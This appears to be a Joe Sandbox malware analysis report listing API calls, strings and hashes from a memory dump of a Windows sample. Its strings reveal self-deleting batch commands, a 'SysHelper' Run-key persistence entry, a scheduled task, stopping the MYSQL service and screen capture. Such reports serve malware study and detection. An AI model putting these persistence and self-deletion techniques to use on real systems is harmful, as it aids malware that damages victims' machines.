                • CloseHandle.KERNEL32 ref: 0041256E
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorLastMutex
                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                • API String ID: 2372642624-488272950
                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                APIs
                • GetLastError.KERNEL32 ref: 00411915
                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                • _memset.LIBCMT ref: 004119B8
                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                • String ID: failed with error
                • API String ID: 4182478520-946485432
                • Opcode ID: 026a8ed3bdaea1c9a44133b8e41068491a8e55accbc0c87c52e748ca9719700f
                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                • Opcode Fuzzy Hash: 026a8ed3bdaea1c9a44133b8e41068491a8e55accbc0c87c52e748ca9719700f
                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                APIs
                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                • SelectObject.GDI32(?,?), ref: 00482436
                • DeleteObject.GDI32(00000000), ref: 0048243D
                • DeleteDC.GDI32(?), ref: 0048244A
                • DeleteDC.GDI32(?), ref: 00482450
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                • API String ID: 151064509-1805842116
                • Opcode ID: af425f0bdac543ca25f1fae7ff2a53bf1cfa0fd4ab80a64cc2dce097e2973e2e
                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                • Opcode Fuzzy Hash: af425f0bdac543ca25f1fae7ff2a53bf1cfa0fd4ab80a64cc2dce097e2973e2e
                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                APIs
                • DecodePointer.KERNEL32 ref: 00427B29
                • _free.LIBCMT ref: 00427B42
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                • _free.LIBCMT ref: 00427B55
                • _free.LIBCMT ref: 00427B73
                • _free.LIBCMT ref: 00427B85
                • _free.LIBCMT ref: 00427B96
                • _free.LIBCMT ref: 00427BA1
                • _free.LIBCMT ref: 00427BC5
                • EncodePointer.KERNEL32(00635458), ref: 00427BCC
                • _free.LIBCMT ref: 00427BE1
                • _free.LIBCMT ref: 00427BF7
                • _free.LIBCMT ref: 00427C1F
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID: XTc
                • API String ID: 3064303923-2541883048
                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                • API String ID: 909875538-2733969777
                • Opcode ID: 3bad3cb084291eb1c2bbc43ba19b1b46a9bd959c97fa9acc6cc8540940d610f6
                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                • Opcode Fuzzy Hash: 3bad3cb084291eb1c2bbc43ba19b1b46a9bd959c97fa9acc6cc8540940d610f6
                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 006bfa9036a5487fa5e659dc939274a1e485e21b3a0578db8bc342fd26765a9b
                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                • Opcode Fuzzy Hash: 006bfa9036a5487fa5e659dc939274a1e485e21b3a0578db8bc342fd26765a9b
                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                APIs
                • CoInitialize.OLE32(00000000), ref: 00411BB0
                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                • CoUninitialize.OLE32 ref: 00411BD0
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                • lstrcatW.KERNEL32(?), ref: 00411C44
                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                • String ID: \shell32.dll
                • API String ID: 679253221-3783449302
                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                APIs
                • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                • GetDesktopWindow.USER32 ref: 004549FB
                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                • _wcsstr.LIBCMT ref: 00454A8A
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: Service-0x$_OPENSSL_isservice
                • API String ID: 2112994598-1672312481
                • Opcode ID: 18e042caf2cd4394db39376461ab0cc8a32a9e3f5bb981467ad6ca9449a93adc
                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                • Opcode Fuzzy Hash: 18e042caf2cd4394db39376461ab0cc8a32a9e3f5bb981467ad6ca9449a93adc
                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                APIs
                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                • GetFileType.KERNEL32(00000000), ref: 00454B05
                • __vfwprintf_p.LIBCMT ref: 00454B27
                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                • vswprintf.LIBCMT ref: 00454B5D
                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                • String ID: OPENSSL$OpenSSL: FATAL
                • API String ID: 277090408-1348657634
                • Opcode ID: 09c5ffbe004322fb5edb75d7b08a589fa05082c23f97f4e858192e99806d6cdf
                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                • Opcode Fuzzy Hash: 09c5ffbe004322fb5edb75d7b08a589fa05082c23f97f4e858192e99806d6cdf
                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                • _memset.LIBCMT ref: 004123B6
                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                • GetCommandLineW.KERNEL32 ref: 004123F4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                Strings
                • SysHelper, xrefs: 004123D6
                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                • API String ID: 122392481-4165002228
                • Opcode ID: a51db735698a41f0a495beb9b07ff69d7eeed6e408a0830d11e0f70f94ed0358
                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                • Opcode Fuzzy Hash: a51db735698a41f0a495beb9b07ff69d7eeed6e408a0830d11e0f70f94ed0358
                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                • String ID:
                • API String ID: 1077091919-0
                • Opcode ID: ac3d283600512a096245aeca8b781c3adabf0a7b47fdeef014d80140aa85ea25
                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                • Opcode Fuzzy Hash: ac3d283600512a096245aeca8b781c3adabf0a7b47fdeef014d80140aa85ea25
                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 2365dba272ac9ef843ec83cad67e28dc9e178db43af24e503ab63c731e201ecd
                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                • Opcode Fuzzy Hash: 2365dba272ac9ef843ec83cad67e28dc9e178db43af24e503ab63c731e201ecd
                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                • _memset.LIBCMT ref: 0040DC38
                • CoUninitialize.OLE32 ref: 0040DC92
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                • String ID: --Task$Comment$Time Trigger Task
                • API String ID: 330603062-1376107329
                • Opcode ID: c5fadb80c971dad2caa9d7f95957ff1f1a43d7a7d51cba69068291a801761176
                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                • Opcode Fuzzy Hash: c5fadb80c971dad2caa9d7f95957ff1f1a43d7a7d51cba69068291a801761176
                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                • Sleep.KERNEL32(?), ref: 00411A75
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                • String ID: MYSQL
                • API String ID: 2359367111-1651825290
                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                APIs
                • std::exception::exception.LIBCMT ref: 0044F27F
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F294
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                • std::exception::exception.LIBCMT ref: 0044F2AD
                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                • std::exception::exception.LIBCMT ref: 0044F2FB
                • __CxxThrowException@8.LIBCMT ref: 0044F310
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                • String ID: bad function call
                • API String ID: 2464034642-3612616537
                • Opcode ID: bdd583901cd0eb1ff6a43a4fc0efc7d8b3549654f07c9a6256ee8d3e825696c9
                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                • Opcode Fuzzy Hash: bdd583901cd0eb1ff6a43a4fc0efc7d8b3549654f07c9a6256ee8d3e825696c9
                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                APIs
                • _memset.LIBCMT ref: 004235B1
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __gmtime64_s.LIBCMT ref: 0042364A
                • __gmtime64_s.LIBCMT ref: 00423680
                • __gmtime64_s.LIBCMT ref: 0042369D
                • __allrem.LIBCMT ref: 004236F3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                • __allrem.LIBCMT ref: 00423726
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                • __allrem.LIBCMT ref: 0042375B
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                • String ID:
                • API String ID: 1503770280-0
                • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                Strings
